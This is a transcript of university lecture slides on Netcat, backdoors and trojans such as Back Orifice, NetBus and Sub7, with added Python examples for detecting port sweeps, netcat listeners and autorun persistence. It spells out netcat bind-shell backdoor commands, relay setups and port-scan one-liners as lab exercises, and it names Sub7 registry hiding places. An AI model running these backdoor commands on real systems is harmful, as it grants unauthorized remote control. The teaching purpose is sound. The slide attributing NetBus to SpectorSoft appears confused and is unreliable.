
Backdoors and Trojans.

Presentation on theme: "Backdoors and Trojans."— Presentation transcript:

1 Backdoors and Trojans

2 ECE 4112 - Internetwork Security
Agenda
  Overview
  Netcat
  Trojans/Backdoors
ECE Internetwork Security

3 Agenda: Netcat
  Netcat Overview
  Major Features
  Installation and Configuration
  Possible Uses
  Netcat Defenses
  Summary

4 Netcat – TCP/IP Swiss Army Knife
  Reads and writes data across the network using TCP/UDP connections
  Feature-rich network debugging and exploration tool
  Part of the Red Hat Power Tools collection; comes standard on SuSE Linux, Debian Linux, NetBSD and OpenBSD distributions
  UNIX and Windows versions available at:

5 Netcat
  Designed to be a reliable “back-end” tool: used directly, or easily driven by other programs and scripts
  Very powerful in combination with scripting languages (e.g. Perl)
  “If you were on a desert island, Netcat would be your tool of choice!” - Ed Skoudis

6 Netcat – Major Features
  Outbound or inbound connections, TCP or UDP, to or from any ports
  Full DNS forward/reverse checking, with appropriate warnings
  Ability to use any local source port
  Ability to use any locally-configured network source address
  Built-in port-scanning capabilities, with randomizer

7 Netcat – Major Features (contd)
  Built-in loose source-routing capability
  Can read command line arguments from standard input
  Slow-send mode, one line every N seconds
  Hex dump of transmitted and received data
  Optional ability to let another program service established connections
  Optional telnet-options responder

8 Netcat (called ‘nc’)
  Can run in client or server (listen) mode; the default mode is client
  Same executable for both modes
  Client mode:
    nc [dest] [port_no_to_connect_to]
  Listen mode (-l option):
    nc -l -p [port_no_to_listen_on]

9 Netcat – Client mode
  Computer with netcat in client mode
  Input comes from a standard input device
  Passes through netcat in client mode
  Output is sent across the network to any TCP/UDP port on any system

10 Netcat – Listen mode
  Computer with netcat in listen mode
  Input comes from the network on any TCP/UDP port
  Passes through netcat in listen mode
  Output appears on the standard output device

11 Netcat – Configuration
  Linux installation:
    tar xvfz netcat.tar.gz
    cd netcat
    make linux
    cp nc /usr/local/sbin
  Note: the last command lets you run netcat without specifying its directory, because /usr/local/sbin is on the PATH

12 Netcat – Installation
  Windows installation:
    Copy the file nc11nt.zip into a folder
    Unzip this file; it creates a directory called nc11nt
    To run netcat, go to the nc11nt folder and run it from there

13 Netcat – Possible uses
  Transfer files
  Scan ports
  Create backdoors
  Create relays
  Many more…

14 Netcat – File transfer
  Scenario: an attacker wants to transfer a file to another machine; only one port is open on it, and that port is not the FTP port
  Windows – nc listener (IP: a.b.c.d):
    c:\ nc -l -p 1234 > testfile.txt
  Linux – nc client (connecting to a.b.c.d):
    nc a.b.c.d 1234 < testfile.txt
  Here the attacker is using port number 1234 for the file transfer.

15 Netcat – Scan ports
  Goal: to scan ports without using nmap
  Send H-E-L-L-O to each target port
  On the client machine:
    echo Hello | nc -v -w 3 -z a.b.c.d 1-200
  This will go to ports 1 through 200 (TCP or UDP) on the target machine, waiting at most 3 seconds per port
  (Note: -z is zero-I/O mode, so netcat only reports whether each port accepts a connection; the piped “Hello” is not actually sent.)
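A sweep like the one above leaves a very recognisable trace on the target's firewall log: one source touching many distinct ports within seconds. The following detector is an added example, not part of the lecture; it runs over constructed iptables-style log lines (the SAMPLE_LOG list, assumed format "SRC=... PROTO=... DPT=...") and flags any source that hits at least min_ports distinct destination ports inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed iptables-style log lines (not a real capture): 10.0.0.5 sweeps
# TCP ports 1-12 within a few seconds, as "nc -z a.b.c.d 1-200" would,
# while 10.0.0.7 simply reconnects to port 22 three times.
SAMPLE_LOG = [
    f"Mar 14 10:00:0{p % 4} gw kernel: IN=eth0 SRC=10.0.0.5 DST=10.0.0.9 PROTO=TCP DPT={p}"
    for p in range(1, 13)
] + [
    "Mar 14 10:00:02 gw kernel: IN=eth0 SRC=10.0.0.7 DST=10.0.0.9 PROTO=TCP DPT=22",
    "Mar 14 10:00:05 gw kernel: IN=eth0 SRC=10.0.0.7 DST=10.0.0.9 PROTO=TCP DPT=22",
    "Mar 14 10:00:09 gw kernel: IN=eth0 SRC=10.0.0.7 DST=10.0.0.9 PROTO=TCP DPT=22",
]

LINE_RE = re.compile(r"^(\w{3} +\d+ [\d:]+) \S+ kernel: .*SRC=(\S+) .*PROTO=(\S+) DPT=(\d+)")

def parse(line, year=2024):
    """Return (timestamp, src, proto, dport) for a kernel firewall log line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {' '.join(m.group(1).split())}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), int(m.group(4))

def find_port_sweeps(lines, min_ports=10, window_s=60):
    """Map each source that touched >= min_ports distinct destination ports
    inside any window_s-second window to the sorted list of those ports."""
    events = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec:
            ts, src, _proto, dport = rec
            events[src].append((ts, dport))
    sweeps = {}
    for src, evs in events.items():
        evs.sort()
        for i, (t0, _) in enumerate(evs):
            ports = {p for t, p in evs[i:] if (t - t0).total_seconds() <= window_s}
            if len(ports) >= min_ports:
                sweeps[src] = sorted(ports)
                break
    return sweeps

if __name__ == "__main__":
    for src, ports in find_port_sweeps(SAMPLE_LOG).items():
        print(f"possible port sweep from {src}: {len(ports)} ports ({ports[0]}-{ports[-1]})")
```

The thresholds are assumptions; tune min_ports and window_s to the normal connection mix of the host being watched.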

16 Netcat – Create backdoors
  On the Windows machine, create a netcat backdoor listener that runs the cmd.exe shell:
    c:\ nc -l -p 7777 -e cmd.exe
  Connect to this backdoor by running netcat in client mode on the Linux machine:
    nc a.b.c.d 7777
  Can send commands like “cd” and “mkdir”
Exercise: On your Windows machine, create a Netcat backdoor listener that runs the cmd.exe shell. Select any port number you’d like for the listener. Connect to this backdoor by running Netcat in client mode on your Linux machine. Now run some simple commands such as “dir” and “mkdir”. Then try running some more complex commands and examine the extent of information that you can learn about the system in this manner.

17 Netcat – Create relays
  Can be used to bounce connections between systems; obscures the attacker’s source
  Create a relay on the Linux machine
  Configure the relay to forward data to another port on the Linux machine
  At the other port, set up a netcat backdoor shell
  Connect to the relay from the Windows machine using netcat in client mode
Exercise: Using a Netcat listener and client, create a relay on your Linux machine. Configure the relay to forward any received information to another port on your Linux machine. At that other port, set up a Netcat backdoor shell. Connect to your relay from your Windows machine using Netcat in client mode. For this exercise, you’ll use Netcat the following four times:
  As a listener in the relay on your Linux machine
  As a client in the relay on your Linux machine
  As a listener, ready to run a shell on the Linux machine
  As a client on your Windows machine, where commands can be typed to be sent to the relay

18 Netcat Defenses
  For file transfer and port scanning: close all unused ports
  For backdoors:
    Close unused ports
    Carefully audit system usage
    Check applications running with root privileges
    Close suspicious programs
  For relays: multiple layers of security
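The backdoor defenses above (audit what is listening, check what runs as root, close suspicious programs) can be scripted. This is an added example, not from the lecture: it joins constructed "ss -ltnp" and "ps -eo pid,user,args" output (both assumed formats, embedded inline) on the process id and reports any listener that is a netcat binary, hands each connection to a program with -e or -c, or sits on a port outside the host's expected set.

```python
import re

# Constructed samples (not captured from a real host) of "ss -ltnp" and
# "ps -eo pid,user,args" output from the same Linux machine.
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       511     0.0.0.0:80          0.0.0.0:*          users:(("nginx",pid=1203,fd=6))
LISTEN  0       1       0.0.0.0:7777        0.0.0.0:*          users:(("nc",pid=4410,fd=3))
"""
PS_OUTPUT = """\
  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 1203 www-data nginx: worker process
 4410 root     nc -l -p 7777 -e /bin/sh
"""
NETCAT_NAMES = {"nc", "ncat", "netcat"}
EXPECTED_PORTS = {22, 80}  # assumption: the ports this host is documented to serve
SS_RE = re.compile(r'^LISTEN\s+\S+\s+\S+\s+\S+:(\d+)\s+\S+\s+users:\(\("([^"]+)",pid=(\d+)')

def parse_ps(text):
    """Map pid -> {"user", "args"} from ps output (header line skipped)."""
    procs = {}
    for line in text.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) == 3:
            procs[int(parts[0])] = {"user": parts[1], "args": parts[2]}
    return procs

def audit_listeners(ss_text, ps_text):
    """One finding per listener that is a netcat binary, hands the socket to a
    program (-e/-c), or listens on a port outside EXPECTED_PORTS."""
    procs = parse_ps(ps_text)
    findings = []
    for line in ss_text.splitlines():
        m = SS_RE.match(line)
        if not m:
            continue
        port, name, pid = int(m.group(1)), m.group(2), int(m.group(3))
        proc = procs.get(pid, {"user": "?", "args": ""})
        reasons = []
        if name in NETCAT_NAMES:
            reasons.append("netcat listener")
        if re.search(r"\s-[ec]\s", proc["args"]):
            reasons.append("spawns a program for each connection")
        if port not in EXPECTED_PORTS:
            reasons.append("unexpected port")
        if reasons:
            findings.append({"port": port, "pid": pid, "user": proc["user"], "program": name, "reasons": reasons})
    return findings
```

A finding whose user is root deserves the closest look, since a shell spawned from such a listener inherits those privileges.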

19 Summary: Netcat
  Netcat Overview
  Major Features
  Installation and Configuration
  Possible Uses
  Netcat Defenses
  Next: Trojans/Backdoors

20 Agenda: Trojans/Backdoors
  Malicious Remote Access Tools
  Backdoors
  Trojans
  Defenses against Trojans/Backdoors
  Virtual Network Connections
  Summary

21 Malicious Remote Access Tools
  Backdoors
    Also called a “trapdoor”
    An undocumented way of gaining access to a program, online service or an entire computer system
    Allows privileged operations to be executed on the affected machine
  Trojan Horse
    Does not replicate or copy itself
    Damages or compromises the security of the computer
    It relies on someone e-mailing it to you; it does not e-mail itself
Basically BO is a remote administration tool, but it can be used for malicious purposes as well. Bear in mind that when you keep such a remote access server running on your computer you are always running the risk of an attack, because a remote attacker can exploit vulnerabilities in that software to gain access to your computer. You can achieve some level of security with this RAS server running by having a personal firewall on your system that blocks TCP connects from all but one host, but then again IP spoofing has been around for quite some while too. If anything is on the network you cannot bring the risk of attacks to zero; you can only minimize it using tools, while at the same time keeping some flexibility for your own purposes.

22 Back Orifice
  Authored by Cult of the Dead Cow
  Released on 3rd Aug 1998
  Allows remote manipulation of: file system, registry, system, passwords, network, processes

23 Back Orifice (cont.)
  First widely used trojan
  Complete implementation of services supported by the Windows 95/98 API
  Small, freely available
  Attached to an innocent binary
  Detection:
    Encrypted UDP (port 31337)
    XOR packets with random stream + password
    Optional TCP file transfer

24 NetBus
  Officially distributed by SpectorSoft
  eBlaster
    Records information and e-mails it
    All websites visited, applications run, keystrokes typed, chat conversations, instant messages
  Spector
    Like a “camera”
    Records everything being done on the computer, takes several screenshots which can be played back as a movie

25 NetBus
  The author of NetBus says, "NetBus was made to let people have some fun with his/her friends."
  He also says, "I hope NetBus (and similar programs like Back Orifice) will make more people aware of the security risks at their system."
  Unfortunately, NetBus allows far more access than a mere prank should ever require

26 NetBus
  It allows anyone running the client portion to connect to and control anyone running the server portion of it, with the same rights and privileges as the currently logged-on user.

27 NetBus Features
  Does everything Back Orifice can do, and more
  Tricks with the CD tray (open or close on command, or at timed intervals)
  Mouse control (can swap the functions of the left and right buttons)
  Sends interactive dialogues to communicate with the compromised machine

28 Sub7
  One of the most popular and powerful trojan horses around
  Originally known as Backdoor G
  Has been revised many times in the past
  Known for its ease of use and flexible settings

29 Sub7
  A partial list of what Sub7 can do:
    Monitor all online activity
    Manipulate any file on the machine
    Edit the registry
    Host FTP servers
    Record passwords and keystrokes
    Watch you (if you have a webcam)
    and much more…

30 Sub7
  Used to escape virus detection, since it morphs itself every time it is sent to a new victim
  How it loads, where it hides:
    It can hide in any directory and can load from the registry and a few other less-known places
    It can be assigned a different file name each time it runs, so every time the machine is rebooted the file is altered in some way
    Harder to track down and delete

31 Sub7
  It usually hides in the following locations:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or CurrentVersion\RunServices
    HKEY_CLASSES_ROOT\*\shellex

32 Sub7
  If it is placed in the shellex part of the registry, the computer will not function properly even after the infected file is removed
  E.g. c:\windows\sub7.exe /notepad.exe
  Removing sub7.exe will also stop normal execution of notepad.exe
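The two Sub7 slides above give a defender two concrete things to check: the Run/RunServices autorun keys, and the wrapper pattern in which an autorun entry launches a second program as its argument (sub7.exe /notepad.exe). The script below is an added example, not part of the lecture; it parses a constructed "reg export" fragment (assumed .reg text format, embedded inline) and flags autorun entries whose executable lies outside an assumed set of trusted directories or whose arguments name another .exe.

```python
import re

# Constructed fragment of a "reg export" file (not taken from a real machine).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="\"C:\\Program Files\\ExampleVendor\\updater.exe\" /quiet"
"WinLoader"="c:\\windows\\sub7.exe /notepad.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"Sys"="C:\\WINDOWS\\TEMP\\sys.exe"
'''

KEY_RE = re.compile(r"^\[(.+)\]$")
VAL_RE = re.compile(r'^"([^"]*)"="(.*)"$')
AUTORUN_KEYS = (r"\currentversion\run", r"\currentversion\runservices")
TRUSTED_DIRS = (r"c:\program files", r"c:\windows\system32")  # assumption: site policy

def parse_reg(text):
    """Yield (key, value_name, unescaped_string) for each string value in a .reg export."""
    key = None
    for line in text.splitlines():
        if km := KEY_RE.match(line):
            key = km.group(1)
        elif (vm := VAL_RE.match(line)) and key:
            yield key, vm.group(1), vm.group(2).replace("\\\\", "\\").replace('\\"', '"')

def split_command(cmd):
    # Split an autorun command into (executable, args); a quoted path may contain spaces.
    cmd = cmd.strip()
    if cmd.startswith('"'):
        exe, _, rest = cmd[1:].partition('"')
        return exe, rest.split()
    parts = cmd.split()
    return (parts[0], parts[1:]) if parts else ("", [])

def audit_autoruns(text):
    """Flag Run/RunServices entries outside TRUSTED_DIRS or using the wrapper pattern."""
    findings = []
    for key, name, value in parse_reg(text):
        if not key.lower().endswith(AUTORUN_KEYS):
            continue
        exe, args = split_command(value)
        reasons = []
        if not exe.lower().startswith(TRUSTED_DIRS):
            reasons.append("executable outside trusted directories")
        if any(a.lower().endswith(".exe") for a in args):
            reasons.append("argument names another executable (wrapper pattern)")
        if reasons:
            findings.append({"key": key, "name": name, "exe": exe, "reasons": reasons})
    return findings
```

Because a wrapper entry is what keeps the legitimate program running, a flagged wrapper should be repaired (point the entry back at the real program) rather than simply deleted.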

33 Sub7 Screenshot #1
  Sub7 main window. Shown here are the different server settings.

34 Sub7 Screenshot #2
  Sub7 screen capture.

35 Sub7 Screenshot #3
  Sub7 file manager.

36 Sub7 Screenshot #4
  Sub7 Server Editor program. Allows the attacker to customize the server so that virus scanners and intrusion detection systems can't find it; controls the cloaking and other options of the Sub7 server.

37 How attackers find an infected PC
  Some trojans report the IP address on an IRC channel
  Port scanners are used to find PCs which have “the backdoor open”
  Customized access: password protected, so the infected machine can then be accessed only by the person who has the password

38 Defense against Trojans/Backdoors
  Scan attachments properly (the most common way of infecting machines)
  Anti-virus checks
  Firewalls
  Remove suspicious programs/processes

39 Virtual Network Connections
  Application-level backdoor
  Can control, for example, a Windows machine from a Linux machine using VNC:
    Install VNC
    Run the VNC server on the Windows machine
    Use the Linux VNC viewer to access the server on the Windows machine

40 Virtual Network Connections
  Controlling a Linux machine from Windows:
    Run the VNC server on Linux
    Use the VNC viewer from Windows to access the Linux machine
  Note: reconfigure the firewall on the Linux machine to accept packets for the VNC port (TCP port 5901)
  Hint: on Linux, you will see another virtual desktop, not the normal user’s desktop and mouse movements. Still, even though you cannot see what the normal user is doing, you have remote control of the Linux system from Windows.

41 Summary
  Trojans
  Backdoors
  Defenses against Trojans/Backdoors
  Virtual Network Connections
